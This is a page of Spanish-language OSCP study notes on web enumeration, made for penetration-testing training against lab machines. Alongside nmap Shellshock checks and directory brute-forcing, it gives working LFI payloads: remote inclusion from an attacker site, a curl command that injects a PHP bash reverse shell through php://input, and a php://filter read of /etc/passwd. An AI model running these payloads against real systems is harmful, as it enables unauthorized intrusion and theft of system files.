OSCP Notes
  • OSCP Cheatsheet
  • Sistema de ficheros del OS
    • File Transfers Linux
    • File Transfers Windows
  • Web Attacks
    • Web Enumeration
    • SQL Injection
    • CGI
    • CMS
  • DATABASES
    • MSSQL
    • MYSQL
  • Services Enumeration
    • Trucos Generales
    • POP3 - 110
    • SMB - (445-139)
    • DNS
    • NFS - 2049
    • SMTP - 25
    • TFTP - 69
    • SNMP - (161-162-10161-10162)
  • Privilege Escalation
    • Information Gathering - EscPriv
    • Windows Privilege Escalation
      • MANUAL - Windows PrivEsc
      • Bypass UAC
    • Linux Privilege Escalation
  • Password Attacks
    • Hash Identification
    • Brute Force
    • Pass in the Hash
    • Password Cracking
  • Port Redirection and Tunneling
    • Port Forwarding
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Remote Port Forwarding
      • SSH Dynamic Port Forwarding
  • Active Directory Attacks
    • AD Enumeration
    • AD Authentication
    • AD Lateral Movement
    • AD Vulnerabilidades actuales
    • Powershell Empire
  • Buffer Overflow
    • Linux
    • Windows
      • Spiking
      • Fuzzing
      • Finding the Offset
      • Overwriting The EIP
      • Finding the Bad Charaters
      • Finding The Right Module
      • Generating Shellcode and Gaining Shell
  • Client-Side Attacks
    • Windows Office Macros
  • Post-explotacion
    • Trucos Generales
      • Links Utiles
    • Windows
      • Mimikatz
      • Writeup Esc WinXP SP1 with services
      • POWERSHELL
  • CRTP
    • PowerView
    • Notas Generales
Con tecnología de GitBook
En esta página
  • Detectar CGI vulnerable a SHELLSHOCK
  • Enumeración de directorios y ficheros
  • Trucos para LFI
  • Generar certificados cliente intermediate para el navegador PKCS12
  1. Web Attacks

Web Enumeration

Detectar CGI vulnerable a SHELLSHOCK

nmap 10.10.10.111 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Enumeración de directorios y ficheros

gobuster dir  -u http://10.10.10.111/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php,cgi -t 50
dirb http://10.10.10.111/
dirb http://10.10.10.111/Proyecto_Final/ /usr/share/dirb/wordlists/spanish.txt

Trucos para LFI

Including Remote Code:
?file=[file|http|https|ftp]://evilsite.com/shell.txt

Using PHP stream php://input:
Specify your payload in the POST parameters
?file=php://input
curl -s --data "<?system('/bin/bash -i >& /dev/tcp/192.168.119.212/443 0>&1');?>" "http://10.10.10.111/internal/advanced_comment_system/admin.php?ACS_path=php://input%00"

Using PHP stream php://filter:
?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

wfuzz -c -z range,1-65535 --hl=2 http://10.10.10.111:6000/url.php?path=localhost:FUZZ

Generar certificados cliente intermediate para el navegador PKCS12

===>> openssl genrsa -out gerh.key 2048 <<===
Generating RSA private key, 2048 bit long modulus (2 primes)
................................+++++
....................+++++
e is 65537 (0x010001)

===>> openssl req -new -key gerh.key -out gerh.csr <<===
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:CO
State or Province Name (full name) [Some-State]:Bogota
Locality Name (eg, city) []:Bogota
Organization Name (eg, company) [Internet Widgits Pty Ltd]:Spartan
Organizational Unit Name (eg, section) []:SC
Common Name (e.g. server FQDN or YOUR name) []:spartan
Email Address []:gerh@spartan.com

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

===>> openssl x509 -req -in gerh.csr -CA certs/intermediate.cert.pem -CAkey private/intermediate.key.pem -CAcreateserial -out gerh.pem -days 1024 <<===
Signature ok
subject=C = CO, ST = Some-State, O = Fortune, OU = Fortune, CN = Gerh
Getting CA Private Key

===>> openssl pkcs12 -export -out gerh.pfx -inkey gerh.key -in gerh.pem -certfile certs/intermediate.cert.pem <<===
Enter Export Password:
Verifying - Enter Export Password:

===>> curl -k --cert 0xdf.pem --key 0xdf.key https://10.10.10.111
AnteriorFile Transfers WindowsSiguienteSQL Injection

Última actualización hace 2 años